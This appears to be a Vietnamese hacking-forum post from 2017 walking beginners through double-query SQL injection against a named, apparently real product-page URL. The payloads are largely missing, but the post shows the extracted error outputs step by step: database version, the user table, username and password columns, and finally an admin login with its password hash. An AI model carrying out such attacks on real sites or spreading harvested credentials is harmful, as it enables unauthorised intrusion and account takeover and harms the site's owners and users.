Double query based sql injection

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 9, 2017.

 1. Mickey

  Mickey Hacking For Hacker Staff Member

  Mình viết cho newbie thôi nhé
  có bạn đã ra chủ đề là khai thác
  DOUBLE QUERY BASED SQL INJECTION

  sau đây mình xin giải đáp
  http://cachnhiet.com.vn/product.php?icatid=56

  bắt đầu khai thác nhé
  Get the MySQL Version.
  HTML:
  Duplicate entry '5.0.45-community-nt:1' for key 1
  Get Database
  HTML:
  Duplicate entry '[email protected]%1' for key 1
  Get Table
  HTML:
  sử dụng limit
  cho đến khi nào ra tabla user thì thôi
  HTML:
  Duplicate entry 'user1' for key 1
  chuyển user thành hex
  Get the Column Names
  HTML:
  tiếp tục sử dụng limit
  HTML:
  Duplicate entry 'sUserName~1' for key 1
  HTML:
  Duplicate entry 'sPassword~1' for key 1
  ok múc thôi,sao phải xoắn

  HTML:
  Duplicate entry 'admin:a1da25145adb384737b222aa2d002ad51' for key 1
   

Share This Page